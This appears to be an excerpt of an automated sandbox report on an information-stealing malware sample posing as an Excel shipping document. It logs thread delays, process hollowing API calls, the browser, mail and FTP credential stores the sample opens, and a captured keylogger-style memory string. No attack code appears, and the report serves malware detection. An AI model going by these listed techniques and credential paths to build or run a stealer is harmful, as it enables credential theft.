                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeThread delayed: delay time: 594984Jump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeThread delayed: delay time: 594874Jump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeThread delayed: delay time: 594765Jump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeThread delayed: delay time: 594656Jump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeThread delayed: delay time: 594547Jump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeThread delayed: delay time: 594438Jump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeThread delayed: delay time: 594313Jump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeThread delayed: delay time: 594203Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 600000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 599881Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 599763Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 599652Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 599546Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 599437Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 599328Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 599218Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 599109Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 599000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 598890Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 598781Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 598671Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 598561Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 598453Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 598343Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 598234Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 598125Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 598015Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 597906Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 597796Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 597687Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 597578Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 597468Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 597359Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 597250Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 597140Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 597031Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 596922Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 596812Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 596703Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 596560Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 596453Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 596343Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 596234Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 596123Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 596015Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 595906Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 595796Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 595687Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 595577Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 595468Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 595260Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 595156Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 595047Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 594937Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 594828Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 594718Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 594609Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 594500Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 600000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 599875Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 599766Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 599641Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 599531Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 599422Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 599312Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 599203Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 599094Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 598984Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 598875Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 598766Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 598641Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 598516Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 598406Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 598297Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 598188Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 598063Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 597938Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 597828Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 597719Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 597594Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 597484Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 597375Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 597266Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 597156Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 597047Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 596938Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 596813Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 596703Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 596594Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 596469Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 596359Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 596250Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 596141Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 596031Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 595922Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 595812Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 595703Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 595594Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 595469Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 595359Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 595250Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 595141Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 595031Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 594922Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 594812Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 594703Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 594594Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 594484Jump to behavior
                    Source: adobe.exe, 00000008.00000002.4195648887.0000000000D20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll2
                    Source: Ship Docs YINGHAI-MANE PO 240786.xlsx.exe, 00000001.00000002.4196124419.0000000000FFC000.00000004.00000020.00020000.00000000.sdmp, adobe.exe, 00000003.00000002.1970539186.0000000001375000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeMemory allocated: page read and write | page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeCode function: 0_2_052D0054 CreateProcessW,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,Wow64GetThreadContext,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,0_2_052D0054
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeMemory written: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exe base: 400000 value starts with: 4D5AJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeMemory written: C:\Users\user\AppData\Roaming\Adobe\adobe.exe base: 400000 value starts with: 4D5AJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeMemory written: C:\Users\user\AppData\Roaming\Adobe\adobe.exe base: 400000 value starts with: 4D5AJump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeProcess created: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exe "C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess created: C:\Users\user\AppData\Roaming\Adobe\adobe.exe "C:\Users\user\AppData\Roaming\adobe\adobe.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess created: C:\Users\user\AppData\Roaming\Adobe\adobe.exe "C:\Users\user\AppData\Roaming\adobe\adobe.exe"Jump to behavior
                    Source: Ship Docs YINGHAI-MANE PO 240786.xlsx.exe, 00000001.00000002.4198295133.0000000002BA2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
                    Source: Ship Docs YINGHAI-MANE PO 240786.xlsx.exe, 00000001.00000002.4198295133.0000000002BA2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $kq3<b>[ Program Manager]</b> (10/06/2024 12:55:51)<br>
                    Source: Ship Docs YINGHAI-MANE PO 240786.xlsx.exe, 00000001.00000002.4198295133.0000000002BB6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: <html>Time: 07/03/2024 16:38:04<br>User Name: user<br>Computer Name: 818225<br>OSFullName: Microsoft Windows 10 Pro<br>CPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz<br>RAM: 8191.25 MB<br>IP Address: 173.254.250.91<br><hr><b>[ Program Manager]</b> (10/06/2024 12:55:51)<br>{Win}r</html>
                    Source: Ship Docs YINGHAI-MANE PO 240786.xlsx.exe, 00000001.00000002.4198295133.0000000002BA2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $kq8<b>[ Program Manager]</b> (10/06/2024 12:55:51)<br>{Win}THpq$
                    Source: Ship Docs YINGHAI-MANE PO 240786.xlsx.exe, 00000001.00000002.4198295133.0000000002BA2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRkqL
                    Source: Ship Docs YINGHAI-MANE PO 240786.xlsx.exe, 00000001.00000002.4198295133.0000000002BA2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $kq9<b>[ Program Manager]</b> (10/06/2024 12:55:51)<br>{Win}rTHpq$
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeQueries volume information: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeQueries volume information: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeQueries volume information: C:\Users\user\AppData\Roaming\Adobe\adobe.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeQueries volume information: C:\Users\user\AppData\Roaming\Adobe\adobe.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeQueries volume information: C:\Users\user\AppData\Roaming\Adobe\adobe.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeQueries volume information: C:\Users\user\AppData\Roaming\Adobe\adobe.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Stealing of Sensitive Information

                    barindex
                    Source: Yara matchFile source: dump.pcap, type: PCAP
                    Source: Yara matchFile source: 0.2.Ship Docs YINGHAI-MANE PO 240786.xlsx.exe.3e4a770.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Ship Docs YINGHAI-MANE PO 240786.xlsx.exe.3e0f140.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Ship Docs YINGHAI-MANE PO 240786.xlsx.exe.52e0000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Ship Docs YINGHAI-MANE PO 240786.xlsx.exe.3e4a770.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.adobe.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Ship Docs YINGHAI-MANE PO 240786.xlsx.exe.52e0000.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Ship Docs YINGHAI-MANE PO 240786.xlsx.exe.3e0f140.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000003.00000002.1973196935.000000000330C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.1970186494.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.4198295133.0000000002B9C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.4198576799.0000000002BBC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.1973196935.00000000032E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.4198295133.0000000002B71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.4198576799.0000000002B91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1752622729.00000000052E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1751703167.0000000003D35000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Ship Docs YINGHAI-MANE PO 240786.xlsx.exe PID: 6892, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Ship Docs YINGHAI-MANE PO 240786.xlsx.exe PID: 6968, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: adobe.exe PID: 6332, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: adobe.exe PID: 6672, type: MEMORYSTR
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.iniJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.iniJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeFile opened: C:\FTP Navigator\Ftplist.txtJump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                    Source: Yara matchFile source: 0.2.Ship Docs YINGHAI-MANE PO 240786.xlsx.exe.3e4a770.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Ship Docs YINGHAI-MANE PO 240786.xlsx.exe.3e0f140.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Ship Docs YINGHAI-MANE PO 240786.xlsx.exe.52e0000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Ship Docs YINGHAI-MANE PO 240786.xlsx.exe.3e4a770.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.adobe.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Ship Docs YINGHAI-MANE PO 240786.xlsx.exe.52e0000.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Ship Docs YINGHAI-MANE PO 240786.xlsx.exe.3e0f140.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000003.00000002.1970186494.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.1973196935.00000000032E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.4198295133.0000000002B71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
